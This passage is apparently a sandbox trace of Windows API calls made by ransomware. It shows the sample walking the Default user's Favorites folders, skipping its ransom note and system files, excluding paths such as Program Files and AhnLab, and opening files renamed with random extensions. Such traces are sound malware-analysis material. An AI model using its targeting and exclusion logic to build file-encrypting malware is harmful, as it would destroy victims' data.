ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0df97c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.608] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.608] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.608] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0dd3660, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0dd3660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dd3660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.608] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.608] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfefb1330, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.608] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.608] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.608] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.608] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.608] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0df97c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url.v4Y3P", cAlternateFileName="WEBSLI~1.V4Y")) returned 1 [0186.608] lstrcmpiW (lpString1="Web Slice Gallery.url.v4Y3P", lpString2="DECRYPT-FILES.txt") returned 1 [0186.608] lstrcmpiW (lpString1="Web Slice Gallery.url.v4Y3P", lpString2="autorun.inf") returned 1 [0186.608] lstrcmpiW (lpString1="Web Slice Gallery.url.v4Y3P", lpString2="boot.ini") returned 1 [0186.608] lstrcmpiW (lpString1="Web Slice Gallery.url.v4Y3P", lpString2="desktop.ini") returned 1 [0186.608] lstrcmpiW (lpString1="Web Slice Gallery.url.v4Y3P", lpString2="ntuser.dat") returned 1 [0186.608] lstrcmpiW (lpString1="Web Slice Gallery.url.v4Y3P", lpString2="iconcache.db") returned 1 [0186.608] lstrcmpiW (lpString1="Web Slice Gallery.url.v4Y3P", lpString2="bootsect.bak") returned 1 [0186.608] lstrcmpiW (lpString1="Web Slice Gallery.url.v4Y3P", lpString2="ntuser.dat.log") returned 1 [0186.608] lstrcmpiW (lpString1="Web Slice Gallery.url.v4Y3P", lpString2="thumbs.db") returned 1 [0186.608] lstrcmpiW (lpString1="Web Slice Gallery.url.v4Y3P", lpString2="Bootfont.bin") returned 1 [0186.609] lstrlenW (lpString="Web Slice Gallery.url.v4Y3P") returned 27 [0186.609] lstrcmpiW (lpString1="v4Y3P", lpString2="lnk") returned 1 [0186.609] lstrcmpiW (lpString1="v4Y3P", lpString2="exe") returned 1 [0186.609] lstrcmpiW (lpString1="v4Y3P", lpString2="sys") returned 1 [0186.609] lstrcmpiW (lpString1="v4Y3P", lpString2="dll") returned 1 [0186.609] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Links\\") returned 33 [0186.609] lstrlenW (lpString="Web Slice Gallery.url.v4Y3P") returned 27 [0186.609] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\") returned="C:\\Users\\Default\\Favorites\\Links\\" [0186.609] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Links\\", lpString2="Web Slice Gallery.url.v4Y3P" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.v4Y3P") returned="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.v4Y3P" [0186.609] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.609] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.v4Y3P" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.v4y3p"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.609] CloseHandle (hObject=0x0) returned 0 [0186.609] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.609] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0df97c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url.v4Y3P", cAlternateFileName="WEBSLI~1.V4Y")) returned 0 [0186.609] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0186.610] CloseHandle (hObject=0xffffffff) returned 0 [0186.610] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0e1f920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e1f920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0186.610] lstrcmpW (lpString1="Microsoft Websites", lpString2=".") returned 1 [0186.610] lstrcmpW (lpString1="Microsoft Websites", lpString2="..") returned 1 [0186.610] lstrcatW (in: lpString1="Microsoft Websites", lpString2="\\" | out: lpString1="Microsoft Websites\\") returned="Microsoft Websites\\" [0186.610] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0186.610] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="\\Program Files") returned 0x0 [0186.610] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch=":\\Windows") returned 0x0 [0186.610] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="\\Games\\") returned 0x0 [0186.610] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.610] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.610] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.610] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.610] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.610] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="\\All Users") returned 0x0 [0186.610] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.610] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.610] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.611] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="AhnLab") returned 0x0 [0186.611] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.611] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 46 [0186.611] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.611] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\\\0a16c9.tmp") returned 57 [0186.611] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.618] GetLastError () returned 0x5 [0186.618] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 46 [0186.618] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.618] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\\\DECRYPT-FILES.txt") returned 64 [0186.618] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.619] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 46 [0186.619] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*" [0186.619] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0e1f920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e1f920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0186.620] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.620] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0e1f920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e1f920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.620] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.620] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.620] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0df97c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0df97c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0df97c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.620] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.620] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0df97c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url.Qs23Cfb", cAlternateFileName="IEADD-~1.QS2")) returned 1 [0186.620] lstrcmpiW (lpString1="IE Add-on site.url.Qs23Cfb", lpString2="DECRYPT-FILES.txt") returned 1 [0186.620] lstrcmpiW (lpString1="IE Add-on site.url.Qs23Cfb", lpString2="autorun.inf") returned 1 [0186.620] lstrcmpiW (lpString1="IE Add-on site.url.Qs23Cfb", lpString2="boot.ini") returned 1 [0186.620] lstrcmpiW (lpString1="IE Add-on site.url.Qs23Cfb", lpString2="desktop.ini") returned 1 [0186.620] lstrcmpiW (lpString1="IE Add-on site.url.Qs23Cfb", lpString2="ntuser.dat") returned -1 [0186.620] lstrcmpiW (lpString1="IE Add-on site.url.Qs23Cfb", lpString2="iconcache.db") returned 1 [0186.620] lstrcmpiW (lpString1="IE Add-on site.url.Qs23Cfb", lpString2="bootsect.bak") returned 1 [0186.620] lstrcmpiW (lpString1="IE Add-on site.url.Qs23Cfb", lpString2="ntuser.dat.log") returned -1 [0186.620] lstrcmpiW (lpString1="IE Add-on site.url.Qs23Cfb", lpString2="thumbs.db") returned -1 [0186.620] lstrcmpiW (lpString1="IE Add-on site.url.Qs23Cfb", lpString2="Bootfont.bin") returned 1 [0186.620] lstrlenW (lpString="IE Add-on site.url.Qs23Cfb") returned 26 [0186.620] lstrcmpiW (lpString1="Qs23Cfb", lpString2="lnk") returned 1 [0186.620] lstrcmpiW (lpString1="Qs23Cfb", lpString2="exe") returned 1 [0186.620] lstrcmpiW (lpString1="Qs23Cfb", lpString2="sys") returned -1 [0186.620] lstrcmpiW (lpString1="Qs23Cfb", lpString2="dll") returned 1 [0186.620] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 46 [0186.620] lstrlenW (lpString="IE Add-on site.url.Qs23Cfb") returned 26 [0186.620] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0186.620] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="IE Add-on site.url.Qs23Cfb" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.Qs23Cfb") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.Qs23Cfb" [0186.620] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.621] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.Qs23Cfb" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.qs23cfb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.621] CloseHandle (hObject=0x0) returned 0 [0186.621] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.621] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e1f920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url.DGto", cAlternateFileName="IESITE~1.DGT")) returned 1 [0186.621] lstrcmpiW (lpString1="IE site on Microsoft.com.url.DGto", lpString2="DECRYPT-FILES.txt") returned 1 [0186.621] lstrcmpiW (lpString1="IE site on Microsoft.com.url.DGto", lpString2="autorun.inf") returned 1 [0186.621] lstrcmpiW (lpString1="IE site on Microsoft.com.url.DGto", lpString2="boot.ini") returned 1 [0186.621] lstrcmpiW (lpString1="IE site on Microsoft.com.url.DGto", lpString2="desktop.ini") returned 1 [0186.621] lstrcmpiW (lpString1="IE site on Microsoft.com.url.DGto", lpString2="ntuser.dat") returned -1 [0186.621] lstrcmpiW (lpString1="IE site on Microsoft.com.url.DGto", lpString2="iconcache.db") returned 1 [0186.621] lstrcmpiW (lpString1="IE site on Microsoft.com.url.DGto", lpString2="bootsect.bak") returned 1 [0186.621] lstrcmpiW (lpString1="IE site on Microsoft.com.url.DGto", lpString2="ntuser.dat.log") returned -1 [0186.621] lstrcmpiW (lpString1="IE site on Microsoft.com.url.DGto", lpString2="thumbs.db") returned -1 [0186.621] lstrcmpiW (lpString1="IE site on Microsoft.com.url.DGto", lpString2="Bootfont.bin") returned 1 [0186.621] lstrlenW (lpString="IE site on Microsoft.com.url.DGto") returned 33 [0186.621] lstrcmpiW (lpString1="DGto", lpString2="lnk") returned -1 [0186.621] lstrcmpiW (lpString1="DGto", lpString2="exe") returned -1 [0186.621] lstrcmpiW (lpString1="DGto", lpString2="sys") returned -1 [0186.621] lstrcmpiW (lpString1="DGto", lpString2="dll") returned -1 [0186.621] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 46 [0186.622] lstrlenW (lpString="IE site on Microsoft.com.url.DGto") returned 33 [0186.622] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0186.622] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="IE site on Microsoft.com.url.DGto" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.DGto") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.DGto" [0186.622] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.622] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.DGto" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.dgto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.622] CloseHandle (hObject=0x0) returned 0 [0186.622] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.622] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e1f920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Home.url.DGto", cAlternateFileName="MICROS~1.DGT")) returned 1 [0186.622] lstrcmpiW (lpString1="Microsoft At Home.url.DGto", lpString2="DECRYPT-FILES.txt") returned 1 [0186.622] lstrcmpiW (lpString1="Microsoft At Home.url.DGto", lpString2="autorun.inf") returned 1 [0186.622] lstrcmpiW (lpString1="Microsoft At Home.url.DGto", lpString2="boot.ini") returned 1 [0186.622] lstrcmpiW (lpString1="Microsoft At Home.url.DGto", lpString2="desktop.ini") returned 1 [0186.622] lstrcmpiW (lpString1="Microsoft At Home.url.DGto", lpString2="ntuser.dat") returned -1 [0186.622] lstrcmpiW (lpString1="Microsoft At Home.url.DGto", lpString2="iconcache.db") returned 1 [0186.622] lstrcmpiW (lpString1="Microsoft At Home.url.DGto", lpString2="bootsect.bak") returned 1 [0186.622] lstrcmpiW (lpString1="Microsoft At Home.url.DGto", lpString2="ntuser.dat.log") returned -1 [0186.622] lstrcmpiW (lpString1="Microsoft At Home.url.DGto", lpString2="thumbs.db") returned -1 [0186.622] lstrcmpiW (lpString1="Microsoft At Home.url.DGto", lpString2="Bootfont.bin") returned 1 [0186.622] lstrlenW (lpString="Microsoft At Home.url.DGto") returned 26 [0186.622] lstrcmpiW (lpString1="DGto", lpString2="lnk") returned -1 [0186.622] lstrcmpiW (lpString1="DGto", lpString2="exe") returned -1 [0186.623] lstrcmpiW (lpString1="DGto", lpString2="sys") returned -1 [0186.623] lstrcmpiW (lpString1="DGto", lpString2="dll") returned -1 [0186.623] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 46 [0186.623] lstrlenW (lpString="Microsoft At Home.url.DGto") returned 26 [0186.623] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0186.623] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="Microsoft At Home.url.DGto" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.DGto") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.DGto" [0186.623] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.623] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.DGto" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.dgto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.623] CloseHandle (hObject=0x0) returned 0 [0186.623] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.623] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e1f920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Work.url.DGto", cAlternateFileName="MICROS~2.DGT")) returned 1 [0186.623] lstrcmpiW (lpString1="Microsoft At Work.url.DGto", lpString2="DECRYPT-FILES.txt") returned 1 [0186.623] lstrcmpiW (lpString1="Microsoft At Work.url.DGto", lpString2="autorun.inf") returned 1 [0186.623] lstrcmpiW (lpString1="Microsoft At Work.url.DGto", lpString2="boot.ini") returned 1 [0186.623] lstrcmpiW (lpString1="Microsoft At Work.url.DGto", lpString2="desktop.ini") returned 1 [0186.623] lstrcmpiW (lpString1="Microsoft At Work.url.DGto", lpString2="ntuser.dat") returned -1 [0186.623] lstrcmpiW (lpString1="Microsoft At Work.url.DGto", lpString2="iconcache.db") returned 1 [0186.623] lstrcmpiW (lpString1="Microsoft At Work.url.DGto", lpString2="bootsect.bak") returned 1 [0186.623] lstrcmpiW (lpString1="Microsoft At Work.url.DGto", lpString2="ntuser.dat.log") returned -1 [0186.623] lstrcmpiW (lpString1="Microsoft At Work.url.DGto", lpString2="thumbs.db") returned -1 [0186.623] lstrcmpiW (lpString1="Microsoft At Work.url.DGto", lpString2="Bootfont.bin") returned 1 [0186.623] lstrlenW (lpString="Microsoft At Work.url.DGto") returned 26 [0186.624] lstrcmpiW (lpString1="DGto", lpString2="lnk") returned -1 [0186.624] lstrcmpiW (lpString1="DGto", lpString2="exe") returned -1 [0186.624] lstrcmpiW (lpString1="DGto", lpString2="sys") returned -1 [0186.624] lstrcmpiW (lpString1="DGto", lpString2="dll") returned -1 [0186.624] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 46 [0186.624] lstrlenW (lpString="Microsoft At Work.url.DGto") returned 26 [0186.624] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0186.624] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="Microsoft At Work.url.DGto" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.DGto") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.DGto" [0186.624] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.624] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.DGto" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.dgto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.624] CloseHandle (hObject=0x0) returned 0 [0186.624] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.624] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e1f920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url.DGto", cAlternateFileName="MICROS~3.DGT")) returned 1 [0186.624] lstrcmpiW (lpString1="Microsoft Store.url.DGto", lpString2="DECRYPT-FILES.txt") returned 1 [0186.624] lstrcmpiW (lpString1="Microsoft Store.url.DGto", lpString2="autorun.inf") returned 1 [0186.624] lstrcmpiW (lpString1="Microsoft Store.url.DGto", lpString2="boot.ini") returned 1 [0186.624] lstrcmpiW (lpString1="Microsoft Store.url.DGto", lpString2="desktop.ini") returned 1 [0186.624] lstrcmpiW (lpString1="Microsoft Store.url.DGto", lpString2="ntuser.dat") returned -1 [0186.624] lstrcmpiW (lpString1="Microsoft Store.url.DGto", lpString2="iconcache.db") returned 1 [0186.624] lstrcmpiW (lpString1="Microsoft Store.url.DGto", lpString2="bootsect.bak") returned 1 [0186.624] lstrcmpiW 